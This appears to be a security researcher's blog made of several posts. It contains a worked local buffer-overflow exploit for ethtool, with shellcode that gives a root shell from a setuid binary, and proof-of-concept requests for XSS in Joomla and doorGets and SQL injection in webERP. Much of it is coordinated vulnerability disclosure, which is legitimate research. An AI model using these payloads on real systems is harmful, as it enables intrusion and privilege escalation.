Tuesday, 15 April 2014

[EN] Just allow popup

k@lab:~/public_html/js$ cat xxx.html
<!-- seems to be simple ;]                       --!>
<!-- of course will work only with popup enabled --!>

<script>
function NewTab(url){
        var hi=window.open(url, '_blank');
        hi.focus();
}
NewTab(window.location);
</script>
k@lab:~/public_html/js$


;]

Friday, 11 April 2014

[EN] Old-school buffer overflow - ethtool

During last days I was checking some old apps for Slackware 9.1.

My goal was to find some useful bugs to write few exploits (just for practice of course).
During simple fuzzing, I found that 'ethtool' is vulnerable in few places to buffer overflow.

Below is a short note from testing (overflow in '-k' param):

---<code>---
tester@box:~/code/tests/ethtool-3 $ head README
ethtool is a small utility for examining and tuning your ethernet-based
network interface.  See the man page for more details.
tester@box:~/code/tests/ethtool-3 $ head NEWS

Version 3 - January 27, 2005

        * Feature: r8159 register dump support
        * Feature / bug fix: Support advertising gigabit ethernet
        * Bug fix: make sure to advertise 10baseT-HD
        * Other minor bug fixes.

Version 2 - August 17, 2004
 

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Offload parameters for 1ŔPh//shh/binăPSá°
                                         Íű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2$ whoami
tester
sh-3.2$

---<code>---

Few more options of ethtool are also vulnerable (seems to be the same buffer value):
---<code>---

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -K ` perl -e 'print "A"x44,"BBBB"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -K ` perl -e 'print "A"x44,"BBBB"'`
no offload settings changed

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -r ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -r ` perl -e 'print "A"x44,"BBBB"'`
Cannot restart autonegotiation: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -p ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -p ` perl -e 'print "A"x44,"BBBB"'`
Cannot identify NIC: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -t ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -t ` perl -e 'print "A"x44,"BBBB"'`
Cannot get driver information: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -s ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -s ` perl -e 'print "A"x44,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

---<code>---

And if we'll set chown for root and +s for ethtool, we will get:
---<code>---

tester@box:~/code/tests/ethtool-3 $ ls -la ethtool
-rwsr-sr-x 1 root root 203201 Apr  9 15:19 ethtool
tester@box:~/code/tests/ethtool-3 $ ./exthtool

        -=[ ethtool - local buffer overflow exploit ]=-

Offload parameters for 1ŔPh//shh/binăPSá°
                                         Í°ű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2# whoami
root
sh-3.2#

---<code>--- 

That's all :)
Happy hunting!

o/ 

Monday, 31 March 2014

[EN] Simple quick Apache log reading

As far as I can see at logs of my Apache, last few weeks was very busy for few guys trying to hack my honeypot ;) 

Good job guys!

For some reason I decided to create a very simple (but useful) 'log-reader' for Apache.

You can obviously add it to cron or just run as a normal Bash script. 

Here you have a code:

---<code>---
#!/bin/sh

ACCESS="/var/log/apache2/access.log"
FOUND="found.log"
UNIQ="uniq.log"

echo
echo "**** Test Apache logs... ****"
echo

cut -d' ' -f1 $ACCESS > $FOUND

cat $FOUND | uniq > $UNIQ
echo "[+] Found host(s) : " `wc -l $UNIQ`

for host in `cat $UNIQ`; do
  echo "--------------------------------------------------------------"
  echo "[+] Testing : " $host
  host $host
  whois $host | grep -e "country\|address"
  echo ""
  echo "[+] looking for: "
  grep $host $ACCESS | cut -d' ' -f 6-8
  echo "--------------------------------------------------------------"
done

---<code>---

Wednesday, 26 March 2014

[EN] X2 Community - update for you

Few days ago I found that X2 is vulnerable to few web attacks.

After great work of X2 Team, below you will find a link to informations about
new update.

Check here ;)

Great job X2 Team!

Monday, 3 March 2014

[EN] New release of MantisBT 1.2.17

After last patching of MantisBT, there is a fresh and new version!

Check the details about new release and remember to install the patch ;)
More details about this finding you can get here or here

Once again big thanks for the excellent cooperation goes to the Dev Team of Mantis!
Great job!

[EN] Joomla 3.2.2 pre-auth persistent XSS

Maybe you want to verify... ;)

# ==============================================================
# Title ...| Persistent pre-auth XSS in Joomla
# Version .| Joomla 3.2.2
# Date ....| 3.03.2014
# Found ...| HauntIT Blog
# Home ....| http://www.joomla.org
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/cms/joomla/index.php/single-contact HTTP/1.1
Host: 10.149.14.62

(...)
Content-Length: 288

jform%5Bcontact_name%5D=aaaaaa&jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com&jform%5Bcontact_subject%5D=asdas&jform%5Bcontact_message%5D=dasdasdasd&jform%5Bcontact_email_copy%5D=1&option=com_contact&task=contact.submit&return=&id=1%3Aname&e328236e3b63be0be16a0d0d841f63f9=1
---<request>---



Joomla XSS - request


And:

---<response>---
(...)
 title="<strong>Email</strong><br />Email for contact">Email<span class="star">&#160;*</span></label></div>
                <div class="controls"><input type="email" name="jform[contact_email]" class="validate-email" id="jform_contact_email" value="a"><body onload=alert(123)>@b.com" size="30" required aria-required="true" /></div>
            </div>
(...)
---<response>---


From Burp it looks like this:
 

XSS - view from Burp

Response at the page:




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Friday, 28 February 2014

[EN] Mantis 1.2.16 SQL Injection - updated

As I wrote moment ago, there is an SQL injection vulnerability in latest MantisBT.

Currently, because of a fast and great work of Developer Team, it is fixed.

You can check the details here and in public section of this blog.

Once again, big thanks to Developers Team!
Great job! :)

[EN] SQL Injection in webERP

# ==============================================================
# Title ...| SQL Injection in webERP
# Version .| 4.11.3
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.weberp.org
# ==============================================================


# ==============================================================
# SQL Injection

---<request>---
POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 391

FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] SQL Injection in MantisBT 1.2.16

This post will be updated as soon as Vendor will release the patch ;)

[EN] Multiple vulnerabilities in doorGets 6.0

# ==============================================================
# Title ...|
Multiple vulnerabilities in doorGets 6.0
# Version .| doorGets 6.0
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================


# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/door/dg-admin/?controller=modulevideo&uri='`"%3b--#%%2f%2a HTTP/1.1
Host: 10.149.14.62(...)
Connection: close
---<request>---


---<response>---
Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90

Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90
video By Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 95
>10 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 96
>20 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 97
>50 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 98
>100

Notice: Undefined variable: urlPageGo in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 103
---<response>---

# ==============================================================
# 2. Persistent XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=modulepage&uri=asdasd&lg=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 294

modulepage_edit_titre=asdasd&modulepage_edit_article_tinymce=</textarea><body onload=alert(123)>&modulepage_edit_meta_titre=asdasd&modulepage_edit_meta_description=asdasd&modulepage_edit_meta_keys=&modulepage_edit_partage=1&modulepage_edit_submit=Save
---<request>---

# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=configuration&action=siteweb HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 475

configuration_siteweb_statut=1&configuration_siteweb_statut_ip='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&configuration_siteweb_statut_tinymce=&configuration_siteweb_title=startowa&configuration_siteweb_slogan=startowa&configuration_siteweb_description=startowa&configuration_siteweb_copyright=startowa&configuration_siteweb_year=2014&configuration_siteweb_keywords=startowa&configuration_siteweb_id_facebook=&configuration_siteweb_id_disqus=&configuration_siteweb_submit=Save
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/